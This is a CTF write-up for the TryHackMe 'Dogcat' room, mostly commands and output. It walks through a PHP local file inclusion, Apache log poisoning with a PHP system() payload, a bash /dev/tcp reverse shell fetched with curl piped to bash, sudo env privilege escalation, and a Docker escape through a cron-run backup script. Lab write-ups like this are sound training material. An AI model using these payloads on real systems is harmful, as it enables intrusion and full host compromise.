# CTF TryHackMe - Dogcat

## Nmap

```bash
nmap -sC -sV -oN nmap.log 10.10.16.120           
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-29 16:34 CET
Nmap scan report for 10.10.16.120
Host is up (0.084s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 24:31:19:2a:b1:97:1a:04:4e:2c:36:ac:84:0a:75:87 (RSA)
|   256 21:3d:46:18:93:aa:f9:e7:c9:b5:4c:0f:16:0b:71:e1 (ECDSA)
|_  256 c1:fb:7d:73:2b:57:4a:8b:dc:d7:6f:49:bb:3b:d0:20 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: dogcat
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.99 seconds
```

## Check the website

Go to the website 

when clicking on dog or cat button we obtain this url : **http://10.10.174.56/?view=dog**

It seem to be vulnerable to lfi. Let's try to get the source code of index.php

## Trying to perform an LFI

First try to see what's inside the index file

```
http://10.10.174.56/?view=php://filter/convert.base64-encode/resource=cat/../../../../var/www/html/index
```

We got base64 encode data. Go to cyberchef to decode this :

```
<!DOCTYPE HTML>
<html>

<head>
    <title>dogcat</title>
    <link rel="stylesheet" type="text/css" href="/style.css">
</head>

<body>
    <h1>dogcat</h1>
    <i>a gallery of various dogs or cats</i>

    <div>
        <h2>What would you like to see?</h2>
        <a href="/?view=dog"><button id="dog">A dog</button></a> <a href="/?view=cat"><button id="cat">A cat</button></a><br>
        <?php
            function containsStr($str, $substr) {
                return strpos($str, $substr) !== false;
            }
	    $ext = isset($_GET["ext"]) ? $_GET["ext"] : '.php';
            if(isset($_GET['view'])) {
                if(containsStr($_GET['view'], 'dog') || containsStr($_GET['view'], 'cat')) {
                    echo 'Here you go!';
                    include $_GET['view'] . $ext;
                } else {
                    echo 'Sorry, only dogs or cats are allowed.';
                }
            }
        ?>
    </div>
</body>

</html>
```

## Trying to get more files 

Lets grab if we can get more php files like dog.php or cat.php
yes, these files exists :

```
http://10.10.174.56/?view=php://filter/convert.base64-encode/resource=cat/../../../../var/www/html/dog
<img src="dogs/<?php echo rand(1, 10); ?>.jpg" />
```

```
http://10.10.174.56/?view=php://filter/convert.base64-encode/resource=cat/../../../../var/www/html/dog
<img src="cats/<?php echo rand(1, 10); ?>.jpg" />
```

## Trying LFI to RCE 

We got an LFI previously. Check now if we can LFI to RCE, start to check if we can see apache logs :

```
http://10.10.102.232/?view=cat/../../../../var/log/apache2/access.log&ext
```

Great, we can see, apache access log file !

Now intercept request with burp :

```
GET /?view=cat/../../../../var/log/apache2/access.log&ext HTTP/1.1
Host: 10.10.102.232
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```

And edit the user agent to :

```
GET /?view=cat/../../../../var/log/apache2/access.log&ext HTTP/1.1
Host: 10.10.102.232
User-Agent: Mozilla/5.0 <?php system($_GET['lfi']); ?> Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```

Then we can call this url, and get command execution (ls command in this case) :

```
view-source:http://10.10.102.232/?view=cat/../../../../var/log/apache2/access.log&ext&lfi=ls

cats
dog.php
dogs
flag.php
index.php
style.css
```

Yeah, we have RCE, let's reverse shell


## Trying to get a reverse shell

First create our bash script :

```
cat shell.sh                                                                   
#!/bin/bash

bash -c "sh -i >& /dev/tcp/10.9.188.66/9001 0>&1"
```

Then start a python webserver, nc listener and make this request to call and execute our script :

```
http://10.10.102.232/?view=cat/../../../../var/log/apache2/access.log&ext&lfi=curl -s http://10.9.188.66:8000/shell.sh | bash
```


Yeah, we are in : 

```
nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.9.188.66] from (UNKNOWN) [10.10.193.129] 36080
sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

It seems, we are on a docker container

```bash
ls -la /
total 80
drwxr-xr-x   1 root root 4096 Feb  4 05:49 .
drwxr-xr-x   1 root root 4096 Feb  4 05:49 ..
-rwxr-xr-x   1 root root    0 Feb  4 05:49 .dockerenv
```

## Docker Escape

Let's try to escape to get in the host, running deece script :

```bash
./deece.sh
[..SNIP..]
[+] Other mounts .............. Yes
/root/container/backup /opt/backups rw,relatime - ext4 /dev/xvda2 rw,data=ordered
[..SNIP..]
```

We can see to have a volume mounted on /opt/backups with read/write permissions.


go to **/opt/backups** we can see a **bash script** and a **tar file**

```bash
cat backup.sh
#!/bin/bash
tar cf /root/container/backup/backup.tar /root/container

backup.tar
```

Inspect whats inside the tar file

```
cp backup.tar /tmp
cd /tmp
tar xvf backup.tar
```

Yeah, we got all which is inside /root/container.

```
tar -xvf backup.tar
root/container/
root/container/Dockerfile
root/container/backup/
root/container/backup/backup.sh
root/container/launch.sh
[..SNIP..]
```

Look for root/container/Dockerfile

```
[..SNIP..]
# Set up escalation     
RUN chmod +s `which env`
RUN apt-get update && apt-get install sudo -y
RUN echo "www-data ALL = NOPASSWD: `which env`" >> /etc/sudoers
[..SNIP..]
```

List our sudo permissions

```bash
sudo -l
Matching Defaults entries for www-data on c68c56df0862:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on c68c56df0862:
    (root) NOPASSWD: /usr/bin/env
```

The **env binary** is allowed to run as superuser by sudo. Let's pop a root shell

```bash
sudo env /bin/sh
```

Yeah, we are root now

```bash
$ sudo env /bin/sh
id
uid=0(root) gid=0(root) groups=0(root)
```

As we saw earlier, in /opt/backups we have a backup script, in root we can edit this one. Let's try if there is a cront job on the host which launch the script

```bash
echo "curl http://10.9.188.66:8000/test.txt" >> backup.sh
```

Wait a bit, a got a hit

```
10.10.25.111 - - [07/Feb/2022 18:33:03] "GET /test.txt HTTP/1.1" 200 -
```

So let's reverse shell

```bash
echo 'bash -c "sh -i >& /dev/tcp/10.9.188.66/8888 0>&1"' >> backup.sh
```

Wait again, and we are root !

```
nc -lnvp 8888
listening on [any] 8888 ...
connect to [10.9.188.66] from (UNKNOWN) [10.10.25.111] 37416
sh: 0: can't access tty; job control turned off
# cd /root
# ls -la
total 40
drwx------  6 root root 4096 Apr  8  2020 .
drwxr-xr-x 24 root root 4096 Apr  8  2020 ..
lrwxrwxrwx  1 root root    9 Mar 10  2020 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
drwx------  2 root root 4096 Apr  8  2020 .cache
drwxr-xr-x  5 root root 4096 Mar 10  2020 container
-rw-r--r--  1 root root   80 Mar 10  2020 flag4.txt
```

